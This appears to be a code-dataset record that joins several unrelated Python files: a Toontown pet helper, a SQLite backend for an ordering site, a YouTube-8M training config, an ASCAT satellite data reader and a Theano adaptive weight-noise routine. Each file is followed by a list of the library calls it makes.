doodle.setDNA([head, ears, nose, tail, body, color, colorScale, eyes, gender])
doodle.setName(name)
doodle.setPickable(0)
doodle.reparentTo(parent)
doodle.setPosHpr(x, y, z, h, p, r)
doodle.enterNeutralHappy()
if coll:
doodle.initializeBodyCollisions('pet')
return doodle
|
[
"toontown.toon.ToonDNA.ToonDNA",
"panda3d.core.CollisionNode",
"toontown.suit.Suit.Suit",
"toontown.suit.SuitDNA.SuitDNA",
"panda3d.core.CollisionTube",
"toontown.toonbase.ToontownGlobals.CogDepts.index",
"toontown.toon.NPCToons.createLocalNPC",
"toontown.pets.Pet.Pet",
"toontown.toon.Toon.Toon"
] |
[((458, 489), 'toontown.toon.NPCToons.createLocalNPC', 'NPCToons.createLocalNPC', (['toonId'], {}), '(toonId)\n', (481, 489), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((1464, 1475), 'toontown.toon.Toon.Toon', 'Toon.Toon', ([], {}), '()\n', (1473, 1475), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((1780, 1797), 'toontown.toon.ToonDNA.ToonDNA', 'ToonDNA.ToonDNA', ([], {}), '()\n', (1795, 1797), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((3267, 3278), 'toontown.suit.Suit.Suit', 'Suit.Suit', ([], {}), '()\n', (3276, 3278), False, 'from toontown.suit import SuitDNA, Suit\n'), ((3296, 3313), 'toontown.suit.SuitDNA.SuitDNA', 'SuitDNA.SuitDNA', ([], {}), '()\n', (3311, 3313), False, 'from toontown.suit import SuitDNA, Suit\n'), ((4604, 4613), 'toontown.pets.Pet.Pet', 'Pet.Pet', ([], {}), '()\n', (4611, 4613), False, 'from toontown.pets import Pet\n'), ((528, 554), 'toontown.toon.NPCToons.createLocalNPC', 'NPCToons.createLocalNPC', (['(1)'], {}), '(1)\n', (551, 554), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((4275, 4311), 'panda3d.core.CollisionTube', 'CollisionTube', (['(0)', '(0)', '(0.5)', '(0)', '(0)', '(4)', '(2)'], {}), '(0, 0, 0.5, 0, 0, 4, 2)\n', (4288, 4311), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((4331, 4352), 'panda3d.core.CollisionNode', 'CollisionNode', (['"""suit"""'], {}), "('suit')\n", (4344, 4352), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((716, 752), 'panda3d.core.CollisionTube', 'CollisionTube', (['(0)', '(0)', '(0.5)', '(0)', '(0)', '(4)', '(2)'], {}), '(0, 0, 0.5, 0, 0, 4, 2)\n', (729, 752), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((776, 797), 'panda3d.core.CollisionNode', 'CollisionNode', (['"""suit"""'], {}), "('suit')\n", (789, 797), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((2396, 2436), 'toontown.toonbase.ToontownGlobals.CogDepts.index', 'ToontownGlobals.CogDepts.index', (['suitDept'], {}), '(suitDept)\n', (2426, 2436), False, 'from toontown.toonbase import ToontownGlobals\n'), ((2632, 2668), 'panda3d.core.CollisionTube', 'CollisionTube', (['(0)', '(0)', '(0.5)', '(0)', '(0)', '(4)', '(2)'], {}), '(0, 0, 0.5, 0, 0, 4, 2)\n', (2645, 2668), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((2692, 2713), 'panda3d.core.CollisionNode', 'CollisionNode', (['"""suit"""'], {}), "('suit')\n", (2705, 2713), False, 'from panda3d.core import CollisionTube, CollisionNode\n')]
|
from backend_web import sql, pd
def query_sql(PATH_SQL: str, Query: str, fetch: bool):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute(Query)
if fetch:
return cur.fetchone()
conn.commit()
return 0
def sql_tables(PATH_SQL: str, Query: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute(Query)
col = next(zip(*cur.description))
df = pd.DataFrame.from_records(cur.fetchall(), columns=col)
conn.commit()
return df
def initialize_products(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS PRODUCTS(
ID_PRODUCT INTEGER PRIMARY KEY,
NAME TEXT,
DESCRIPTION TEXT,
ID_STALL INTEGER,
PRICE REAL
);
""")
conn.commit()
return 0
def initialize_customers(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS CUSTOMERS(
ID_CUSTOMERS INTEGER PRIMARY KEY,
NAME TEXT,
PASSWORD TEXT,
EMAIL TEXT,
PHONE TEXT,
CREDIT_CARD TEXT
);
""")
conn.commit()
return 0
def initialize_stall(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS STALL(
ID_STALL INTEGER PRIMARY KEY,
NAME TEXT,
PASSWORD TEXT,
ACCOUNT TEXT,
PHONE TEXT
);
""")
return 0
def initalize_order(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS ORDERS(
ID_ORDER INTEGER PRIMARY KEY,
ID_PRODUCT INTEGER,
STATUS TEXT,
SPECIAL_REQUESTS TEXT,
PHONE_NO TEXT,
ID_CUSTOMER INTEGER
);
""")
return 0
def initialize_track(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS TRACK(
ID_BOX INTEGER PRIMARY KEY,
ID_ORDER INTEGER NULL,
ID_STALL INTEGER NULL,
STATUS TEXT
);
""")
return 0
def r_attr(self): # RETURNS THE VALUES OF AN INSTANCE VARIABLES
lst = [types(i) for i, types in zip(self.__dict__.values(), self.__annotations__.values())]
return (*lst,)
def r_col(self): # RETURNS THE PROPERTIES OF A CLASS OR INSTANCE
if type(self) == type(type): # CHECK IF ITS AN CLASS OR INSTANCE OF A CLASS
tup = range(self.__init__.__code__.co_argcount - 1)
self = self(*tup)
return (*self.__dict__,)
def notify_new(email: str):
import os
import smtplib
import imghdr
from email.message import EmailMessage
from backend_web import load_dotenv
load_dotenv(os.path.join(os.getcwd(),".env"))
EMAIL_ADDRESS = os.environ.get("EMAIL_ADDRESS")
EMAIL_KEY = os.environ.get("EMAIL_KEY")
msg = EmailMessage()
msg["Subject"] = "Thank you for registering"
msg["From"] = EMAIL_ADDRESS
msg["To"] = email
msg.set_content("Thank you for registering with our website... Happy Ordering!")
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_KEY)
smtp.send_message(msg)
def parse_items(txt: str):
DATA = txt.split("&")
cmd, cmd_data = DATA[0].split("=")
data = DATA[1:]
return cmd, cmd_data, data
def NULL_FIRST(lst: list):
a = f'{lst[1:]}'[1:-1]
b = f'(NULL, {a})'
return b
def json_to_dic(path: str):
import json
with open(path) as file:
return json.load(file)
|
[
"smtplib.SMTP_SSL",
"json.load",
"os.getcwd",
"email.message.EmailMessage",
"os.environ.get",
"backend_web.sql.connect"
] |
[((3136, 3167), 'os.environ.get', 'os.environ.get', (['"""EMAIL_ADDRESS"""'], {}), "('EMAIL_ADDRESS')\n", (3150, 3167), False, 'import os\n'), ((3184, 3211), 'os.environ.get', 'os.environ.get', (['"""EMAIL_KEY"""'], {}), "('EMAIL_KEY')\n", (3198, 3211), False, 'import os\n'), ((3223, 3237), 'email.message.EmailMessage', 'EmailMessage', ([], {}), '()\n', (3235, 3237), False, 'from email.message import EmailMessage\n'), ((97, 118), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (108, 118), False, 'from backend_web import sql, pd\n'), ((323, 344), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (334, 344), False, 'from backend_web import sql, pd\n'), ((609, 630), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (620, 630), False, 'from backend_web import sql, pd\n'), ((997, 1018), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (1008, 1018), False, 'from backend_web import sql, pd\n'), ((1405, 1426), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (1416, 1426), False, 'from backend_web import sql, pd\n'), ((1754, 1775), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (1765, 1775), False, 'from backend_web import sql, pd\n'), ((2157, 2178), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (2168, 2178), False, 'from backend_web import sql, pd\n'), ((3437, 3476), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', (['"""smtp.gmail.com"""', '(465)'], {}), "('smtp.gmail.com', 465)\n", (3453, 3476), False, 'import smtplib\n'), ((3886, 3901), 'json.load', 'json.load', (['file'], {}), '(file)\n', (3895, 3901), False, 'import json\n'), ((3090, 3101), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3099, 3101), False, 'import os\n')]
|
"""Video classification configuration definition."""
from typing import Optional, Tuple
import dataclasses
from official.core import config_definitions as cfg
from official.core import exp_factory
from official.modeling import hyperparams
from official.modeling import optimization
from official.vision.beta.configs import common
from absl import flags
FLAGS = flags.FLAGS
@dataclasses.dataclass
class DataConfig(cfg.DataConfig):
"""The base configuration for building datasets."""
name: Optional[str] = None
file_type: Optional[str] = 'tfrecord'
split: str = 'train'
feature_sizes: Tuple[int, ...] = None
feature_names: Tuple[str, ...] = None
segment_size: int = 1
segment_labels: bool = False
temporal_stride: int = 1
max_frames: int = -1
num_classes: int = -1
num_channels: int = 3
num_devices: int = 1
dtype: str = 'float32'
input_path: str = ''
is_training: bool = True
def yt8m(is_training):
"""YT8M dataset configs."""
return DataConfig(
name='yt8m',
num_classes=3862,
feature_sizes=[1024, 128],
feature_names=["rgb", "audio"],
max_frames=300,
segment_labels=False,
segment_size=5,
is_training=is_training,
split='train' if is_training else 'valid',
)
YT8M_TRAIN_EXAMPLES = 4880000 #TODO: get actual numbers
YT8M_VAL_EXAMPLES = 1220000
@dataclasses.dataclass
class YT8MModel(hyperparams.Config):
"""The model config."""
iterations : int = 30
cluster_size : int = 8192
hidden_size : int = 1024
add_batch_norm : bool = True
sample_random_frames : bool = True
is_training : bool = True
activation : str = "sigmoid"
pooling_method : str = "max"
yt8m_agg_classifier_model : str = "MoeModel"
frame_features : bool = False
segment_labels : bool = False
start_new_model : bool = True
@dataclasses.dataclass
class Losses(hyperparams.Config):
name = 'binary_crossentropy'
from_logits: bool = False
label_smoothing: float = 0.0
@dataclasses.dataclass
class YT8MTask(cfg.TaskConfig):
"""The task config."""
model: YT8MModel = YT8MModel()
train_data: DataConfig = yt8m(is_training=True)
validation_data: DataConfig = yt8m(is_training=False)
losses: Losses = Losses()
num_readers: int = 8
top_k: int = 20
top_n: int = None
def add_trainer(experiment: cfg.ExperimentConfig,
train_batch_size: int,
eval_batch_size: int,
learning_rate: float = 0.01,
train_epochs: int = 44,
):
"""Add and config a trainer to the experiment config."""
if YT8M_TRAIN_EXAMPLES <= 0:
raise ValueError('Wrong train dataset size {!r}'.format(
experiment.task.train_data))
if YT8M_VAL_EXAMPLES <= 0:
raise ValueError('Wrong validation dataset size {!r}'.format(
experiment.task.validation_data))
experiment.task.train_data.global_batch_size = train_batch_size
experiment.task.validation_data.global_batch_size = eval_batch_size
steps_per_epoch = YT8M_TRAIN_EXAMPLES // train_batch_size
experiment.trainer = cfg.TrainerConfig(
steps_per_loop=steps_per_epoch,
summary_interval=steps_per_epoch,
checkpoint_interval=steps_per_epoch,
train_steps=train_epochs * steps_per_epoch,
validation_steps=YT8M_VAL_EXAMPLES //
eval_batch_size,
validation_interval=steps_per_epoch,
optimizer_config=optimization.OptimizationConfig({
'optimizer': {
'type': 'adam',
'adam': {
}
},
'learning_rate': {
'type': 'exponential',
'exponential': {
'initial_learning_rate': learning_rate,
'decay_rate': 0.95,
'decay_steps': 4000000,
}
},
}))
return experiment
@exp_factory.register_config_factory('yt8m_experiment')
def yt8m_experiment() -> cfg.ExperimentConfig:
"""Video classification general."""
exp_config = cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=YT8MTask(),
trainer=cfg.TrainerConfig(),
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
'task.train_data.feature_sizes != None',
'task.train_data.feature_names != None'
])
return add_trainer(exp_config, train_batch_size=1024, eval_batch_size=1024)
|
[
"official.modeling.optimization.OptimizationConfig",
"official.core.exp_factory.register_config_factory",
"official.core.config_definitions.TrainerConfig",
"official.core.config_definitions.RuntimeConfig"
] |
[((3701, 3755), 'official.core.exp_factory.register_config_factory', 'exp_factory.register_config_factory', (['"""yt8m_experiment"""'], {}), "('yt8m_experiment')\n", (3736, 3755), False, 'from official.core import exp_factory\n'), ((3341, 3573), 'official.modeling.optimization.OptimizationConfig', 'optimization.OptimizationConfig', (["{'optimizer': {'type': 'adam', 'adam': {}}, 'learning_rate': {'type':\n 'exponential', 'exponential': {'initial_learning_rate': learning_rate,\n 'decay_rate': 0.95, 'decay_steps': 4000000}}}"], {}), "({'optimizer': {'type': 'adam', 'adam': {}},\n 'learning_rate': {'type': 'exponential', 'exponential': {\n 'initial_learning_rate': learning_rate, 'decay_rate': 0.95,\n 'decay_steps': 4000000}}})\n", (3372, 3573), False, 'from official.modeling import optimization\n'), ((3890, 3941), 'official.core.config_definitions.RuntimeConfig', 'cfg.RuntimeConfig', ([], {'mixed_precision_dtype': '"""bfloat16"""'}), "(mixed_precision_dtype='bfloat16')\n", (3907, 3941), True, 'from official.core import config_definitions as cfg\n'), ((3976, 3995), 'official.core.config_definitions.TrainerConfig', 'cfg.TrainerConfig', ([], {}), '()\n', (3993, 3995), True, 'from official.core import config_definitions as cfg\n')]
|
# Copyright (c) 2021, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Readers for ASCAT Level 1b in HDF5 format.
"""
from collections import OrderedDict
import h5py
import numpy as np
import xarray as xr
from ascat.read_native.eps_native import set_flags
class AscatL1bHdf5File:
"""
Read ASCAT Level 1b file in HDF5 format.
"""
def __init__(self, filename):
"""
Initialize AscatL1bHdf5File.
Parameters
----------
filename : str
Filename.
"""
self.filename = filename
def read(self, generic=False, to_xarray=False):
"""
Read ASCAT Level 1b data.
Parameters
----------
generic : bool, optional
'True' reading and converting into generic format or
'False' reading original field names (default: False).
to_xarray : bool, optional
'True' return data as xarray.Dataset
'False' return data as numpy.ndarray (default: False).
Returns
-------
ds : xarray.Dataset, numpy.ndarray
ASCAT Level 1b data.
"""
data = {}
metadata = {}
root = 'U-MARF/EPS/ASCA_SZF_1B/'
mdr_path = root + 'DATA/MDR_1B_FULL_ASCA_Level_1_ARRAY_000001'
mdr_descr_path = root + 'DATA/MDR_1B_FULL_ASCA_Level_1_DESCR'
metadata_path = root + 'METADATA'
with h5py.File(self.filename, mode='r') as fid:
mdr = fid[mdr_path]
mdr_descr = fid[mdr_descr_path]
mdr_metadata = fid[metadata_path]
var_names = list(mdr.dtype.names)
for var_name in var_names:
data[var_name.lower()] = mdr[var_name]
if var_name.encode() in mdr_descr['EntryName']:
pos = mdr_descr['EntryName'] == var_name.encode()
scale = mdr_descr['Scale Factor'][pos][0].decode()
if scale != 'n/a':
data[var_name.lower()] = (data[
var_name.lower()] / (10. ** float(scale))).astype(
np.float32)
fields = ['SPACECRAFT_ID', 'ORBIT_START',
'PROCESSOR_MAJOR_VERSION', 'PROCESSOR_MINOR_VERSION',
'FORMAT_MAJOR_VERSION', 'FORMAT_MINOR_VERSION']
for f in fields:
pos = np.core.defchararray.startswith(
mdr_metadata['MPHR/MPHR_TABLE']['EntryName'], f.encode())
var = mdr_metadata['MPHR/MPHR_TABLE']['EntryValue'][
pos][0].decode()
if f == 'SPACECRAFT_ID':
var = var[-1]
metadata[f.lower()] = int(var)
# modify longitudes [0, 360] to [-180, 180]
mask = data['longitude_full'] > 180
data['longitude_full'][mask] += -360.
data['time'] = np.datetime64('2000-01-01') + data[
'utc_localisation-days'].astype('timedelta64[D]') + data[
'utc_localisation-milliseconds'].astype('timedelta64[ms]')
# modify azimuth angles to [0, 360]
if 'azi_angle_full' in var_names:
mask = data['azi_angle_full'] < 0
data['azi_angle_full'][mask] += 360
rename_coords = {'longitude_full': ('lon', np.float32),
'latitude_full': ('lat', np.float32)}
for var_name, (new_name, new_dtype) in rename_coords.items():
data[new_name] = data.pop(var_name).astype(new_dtype)
if generic:
data = conv_hdf5l1b_generic(data, metadata)
# 1 Left Fore Antenna, 2 Left Mid Antenna 3 Left Aft Antenna
# 4 Right Fore Antenna, 5 Right Mid Antenna, 6 Right Aft Antenna
antennas = ['lf', 'lm', 'la', 'rf', 'rm', 'ra']
ds = OrderedDict()
for i, antenna in enumerate(antennas):
subset = data['beam_number'] == i+1
metadata['beam_number'] = i+1
metadata['beam_name'] = antenna
# convert dict to xarray.Dataset or numpy.ndarray
if to_xarray:
sub_data = {}
for var_name in data.keys():
if var_name == 'beam_number' and generic:
continue
if len(data[var_name].shape) == 1:
dim = ['obs']
elif len(data[var_name].shape) == 2:
dim = ['obs', 'echo']
sub_data[var_name] = (dim, data[var_name][subset])
coords = {}
coords_fields = ['lon', 'lat', 'time']
for cf in coords_fields:
coords[cf] = sub_data.pop(cf)
ds[antenna] = xr.Dataset(sub_data, coords=coords,
attrs=metadata)
else:
# collect dtype info
dtype = []
for var_name in data.keys():
if len(data[var_name][subset].shape) == 1:
dtype.append(
(var_name, data[var_name][subset].dtype.str))
elif len(data[var_name][subset].shape) > 1:
dtype.append((var_name, data[var_name][
subset].dtype.str, data[var_name][
subset].shape[1:]))
ds[antenna] = np.empty(
data['time'][subset].size, dtype=np.dtype(dtype))
for var_name in data.keys():
if var_name == 'beam_number' and generic:
continue
ds[antenna][var_name] = data[var_name][subset]
return ds
def close(self):
"""
Close file.
"""
pass
def conv_hdf5l1b_generic(data, metadata):
"""
Rename and convert data types of dataset.
Parameters
----------
data : dict of numpy.ndarray
Original dataset.
metadata : dict
Metadata.
Returns
-------
data : dict of numpy.ndarray
Converted dataset.
"""
# convert spacecraft_id to internal sat_id
sat_id = np.array([4, 3, 5])
metadata['sat_id'] = sat_id[metadata['spacecraft_id']-1]
# compute ascending/descending direction
data['as_des_pass'] = (
data['sat_track_azi'] < 270).astype(np.uint8)
flags = {'flagfield_rf1': np.tile(data['flagfield_rf1'], 192),
'flagfield_rf2': np.tile(data['flagfield_rf2'], 192),
'flagfield_pl': np.tile(data['flagfield_pl'], 192),
'flagfield_gen1': data['flagfield_gen1'].flatten(),
'flagfield_gen2': data['flagfield_gen2'].flatten()}
data['f_usable'] = set_flags(flags)
data['f_usable'] = data['f_usable'].reshape(-1, 192)
data['swath_indicator'] = np.int8(data['beam_number'].flatten() > 3)
skip_fields = ['utc_localisation-days', 'utc_localisation-milliseconds',
'degraded_inst_mdr', 'degraded_proc_mdr', 'flagfield_rf1',
'flagfield_rf2', 'flagfield_pl', 'flagfield_gen1',
'flagfield_gen2']
gen_fields_lut = {'inc_angle_full': ('inc', np.float32),
'azi_angle_full': ('azi', np.float32),
'sigma0_full': ('sig', np.float32)}
for var_name in skip_fields:
if var_name in data:
data.pop(var_name)
num_cells = data['lat'].shape[1]
for var_name in data.keys():
if len(data[var_name].shape) == 1:
data[var_name] = np.repeat(data[var_name], num_cells)
if len(data[var_name].shape) == 2:
data[var_name] = data[var_name].flatten()
if var_name in gen_fields_lut.items():
new_name = gen_fields_lut[var_name][0]
new_dtype = gen_fields_lut[var_name][1]
data[new_name] = data.pop(var_name).astype(new_dtype)
return data
|
[
"h5py.File",
"numpy.datetime64",
"numpy.dtype",
"xarray.Dataset",
"numpy.array",
"numpy.tile",
"numpy.repeat",
"collections.OrderedDict",
"ascat.read_native.eps_native.set_flags"
] |
[((7767, 7786), 'numpy.array', 'np.array', (['[4, 3, 5]'], {}), '([4, 3, 5])\n', (7775, 7786), True, 'import numpy as np\n'), ((8330, 8346), 'ascat.read_native.eps_native.set_flags', 'set_flags', (['flags'], {}), '(flags)\n', (8339, 8346), False, 'from ascat.read_native.eps_native import set_flags\n'), ((5399, 5412), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (5410, 5412), False, 'from collections import OrderedDict\n'), ((8007, 8042), 'numpy.tile', 'np.tile', (["data['flagfield_rf1']", '(192)'], {}), "(data['flagfield_rf1'], 192)\n", (8014, 8042), True, 'import numpy as np\n'), ((8074, 8109), 'numpy.tile', 'np.tile', (["data['flagfield_rf2']", '(192)'], {}), "(data['flagfield_rf2'], 192)\n", (8081, 8109), True, 'import numpy as np\n'), ((8140, 8174), 'numpy.tile', 'np.tile', (["data['flagfield_pl']", '(192)'], {}), "(data['flagfield_pl'], 192)\n", (8147, 8174), True, 'import numpy as np\n'), ((2991, 3025), 'h5py.File', 'h5py.File', (['self.filename'], {'mode': '"""r"""'}), "(self.filename, mode='r')\n", (3000, 3025), False, 'import h5py\n'), ((9160, 9196), 'numpy.repeat', 'np.repeat', (['data[var_name]', 'num_cells'], {}), '(data[var_name], num_cells)\n', (9169, 9196), True, 'import numpy as np\n'), ((4483, 4510), 'numpy.datetime64', 'np.datetime64', (['"""2000-01-01"""'], {}), "('2000-01-01')\n", (4496, 4510), True, 'import numpy as np\n'), ((6332, 6383), 'xarray.Dataset', 'xr.Dataset', (['sub_data'], {'coords': 'coords', 'attrs': 'metadata'}), '(sub_data, coords=coords, attrs=metadata)\n', (6342, 6383), True, 'import xarray as xr\n'), ((7065, 7080), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (7073, 7080), True, 'import numpy as np\n')]
|
'''
Functions similar to blocks.graph
'''
import logging
import numpy
import theano
from theano import tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams
from blocks.config import config
from blocks.bricks.base import Brick, application
from picklable_itertools.extras import equizip
from blocks.graph import ComputationGraph
from collections import OrderedDict
logger = logging.getLogger(__name__)
class NoiseBrick(Brick):
"""
A brick to hold parameters introducd by adaptive noise.
For each model parameter, adaptive noise adds its standard deviations.
These new parameters will be held by this brick.
Do not use this brick directly! Its main purpose is to hold noise
parameters and to wrap the new cost.
"""
def __init__(self):
super(NoiseBrick, self).__init__(name='adaptive_noise')
self.parameters = []
self.allocated = True
self.initialized = True
@application(inputs=['train_cost', 'model_cost',
'model_prior_mean', 'model_prior_variance'],
outputs=['total_cost'])
def apply(self, application_call, train_cost, model_cost,
model_prior_mean, model_prior_variance):
# We need to add those as auxiliary variables, as they are not
# used to compute the output, and therefore are lost
application_call.add_auxiliary_variable(model_prior_mean.copy(),
name='model_prior_mean')
application_call.add_auxiliary_variable(model_prior_variance.copy(),
name='model_prior_variance')
total_cost = train_cost + model_cost
total_cost.name = 'total_cost'
return total_cost
def __get_name(param):
brick = None
for annotation in param.tag.annotations:
if isinstance(annotation, Brick):
brick = annotation
break
brick_hierarchy = [brick]
while brick_hierarchy[-1].parents:
brick_hierarchy.append(brick_hierarchy[-1].parents[0])
name = "{}.{}".format('/'.join((b.name for b in brick_hierarchy[::-1])),
param.name)
return name
def apply_adaptive_noise(computation_graph,
cost,
variables,
num_examples,
parameters=None,
init_sigma=1e-6,
model_cost_coefficient=1.0,
seed=None,
gradients=None,
):
"""Add adaptive noise to parameters of a model.
Each of the given variables will be replaced by a normal
distribution with learned mean and standard deviation.
A model cost is computed based on the precision of the the distributions
associated with each variable. It is added to the given cost used to
train the model.
See: <NAME> "Practical Variational Inference for Neural Networks",
NIPS 2011
Parameters
----------
computation_graph : instance of :class:`ComputationGraph`
The computation graph.
cost : :class:`~tensor.TensorVariable`
The cost without weight noise. It should be a member of the
computation_graph.
variables : :class:`~tensor.TensorVariable`
Variables to add noise to.
num_examples : int
Number of training examples. The cost of the model is divided by
the number of training examples, please see
<NAME> "Practical Variational Inference for Neural Networks"
for justification
parameters : list of :class:`~tensor.TensorVariable`
parameters of the model, if gradients are given the list will not
be used. Otherwise, it will be used to compute the gradients
init_sigma : float,
initial standard deviation of noise variables
model_cost_coefficient : float,
the weight of the model cost
seed : int, optional
The seed with which
:class:`~theano.sandbox.rng_mrg.MRG_RandomStreams` is initialized,
is set to 1 by default.
gradients : dict, optional
Adaptive weight noise introduces new parameters for which new cost
and gradients must be computed. Unless the gradients paramter is
given, it will use theano.grad to get the gradients
Returns
-------
cost : :class:`~tensor.TensorVariable`
The new cost
computation_graph : instance of :class:`ComputationGraph`
new graph with added noise.
gradients : dict
a dictionary of gradients for all parameters: the original ones
and the adaptive noise ones
noise_brick : :class:~lvsr.graph.NoiseBrick
the brick that holds all noise parameters and whose .apply method
can be used to find variables added by adaptive noise
"""
if not seed:
seed = config.default_seed
rng = MRG_RandomStreams(seed)
try:
cost_index = computation_graph.outputs.index(cost)
except ValueError:
raise ValueError("cost is not part of the computation_graph")
if gradients is None:
if parameters is None:
raise ValueError("Either gradients or parameters must be given")
logger.info("Taking the cost gradient")
gradients = dict(equizip(parameters,
tensor.grad(cost, parameters)))
else:
if parameters is not None:
logger.warn("Both gradients and parameters given, will ignore"
"parameters")
parameters = gradients.keys()
gradients = OrderedDict(gradients)
log_sigma_scale = 2048.0
P_noisy = variables # We will add noise to these
Beta = [] # will hold means, log_stdev and stdevs
P_with_noise = [] # will hold parames with added noise
# These don't change
P_clean = list(set(parameters).difference(P_noisy))
noise_brick = NoiseBrick()
for p in P_noisy:
p_u = p
p_val = p.get_value(borrow=True)
p_ls2 = theano.shared((numpy.zeros_like(p_val) +
numpy.log(init_sigma) * 2. / log_sigma_scale
).astype(dtype=numpy.float32))
p_ls2.name = __get_name(p_u)
noise_brick.parameters.append(p_ls2)
p_s2 = tensor.exp(p_ls2 * log_sigma_scale)
Beta.append((p_u, p_ls2, p_s2))
p_noisy = p_u + rng.normal(size=p_val.shape) * tensor.sqrt(p_s2)
p_noisy = tensor.patternbroadcast(p_noisy, p.type.broadcastable)
P_with_noise.append(p_noisy)
# compute the prior mean and variation
temp_sum = 0.0
temp_param_count = 0.0
for p_u, unused_p_ls2, unused_p_s2 in Beta:
temp_sum = temp_sum + p_u.sum()
temp_param_count = temp_param_count + p_u.shape.prod()
prior_u = tensor.cast(temp_sum / temp_param_count, 'float32')
temp_sum = 0.0
for p_u, unused_ls2, p_s2 in Beta:
temp_sum = temp_sum + (p_s2).sum() + (((p_u-prior_u)**2).sum())
prior_s2 = tensor.cast(temp_sum/temp_param_count, 'float32')
# convert everything to use the noisy parameters
full_computation_graph = ComputationGraph(computation_graph.outputs +
gradients.values())
full_computation_graph = full_computation_graph.replace(
dict(zip(P_noisy, P_with_noise)))
LC = 0.0 # model cost
for p_u, p_ls2, p_s2 in Beta:
LC = (LC +
0.5 * ((tensor.log(prior_s2) - p_ls2 * log_sigma_scale).sum()) +
1.0 / (2.0 * prior_s2) * (((p_u - prior_u)**2) + p_s2 - prior_s2
).sum()
)
LC = LC / num_examples * model_cost_coefficient
train_cost = noise_brick.apply(
full_computation_graph.outputs[cost_index].copy(), LC,
prior_u, prior_s2)
gradients = OrderedDict(
zip(gradients.keys(),
full_computation_graph.outputs[-len(gradients):]))
#
# Delete the gradients form the computational graph
#
del full_computation_graph.outputs[-len(gradients):]
new_grads = {p: gradients.pop(p) for p in P_clean}
#
# Warning!!!
# This only works for batch size 1 (we want that the sum of squares
# be the square of the sum!
#
diag_hessian_estimate = {p: g**2 for p, g in gradients.iteritems()}
for p_u, p_ls2, p_s2 in Beta:
p_grad = gradients[p_u]
p_u_grad = (model_cost_coefficient * (p_u - prior_u) /
(num_examples*prior_s2) + p_grad)
p_ls2_grad = (numpy.float32(model_cost_coefficient *
0.5 / num_examples * log_sigma_scale) *
(p_s2/prior_s2 - 1.0) +
(0.5*log_sigma_scale) * p_s2 * diag_hessian_estimate[p_u]
)
new_grads[p_u] = p_u_grad
new_grads[p_ls2] = p_ls2_grad
return train_cost, full_computation_graph, new_grads, noise_brick
|
[
"theano.tensor.log",
"numpy.zeros_like",
"numpy.log",
"theano.tensor.exp",
"theano.tensor.cast",
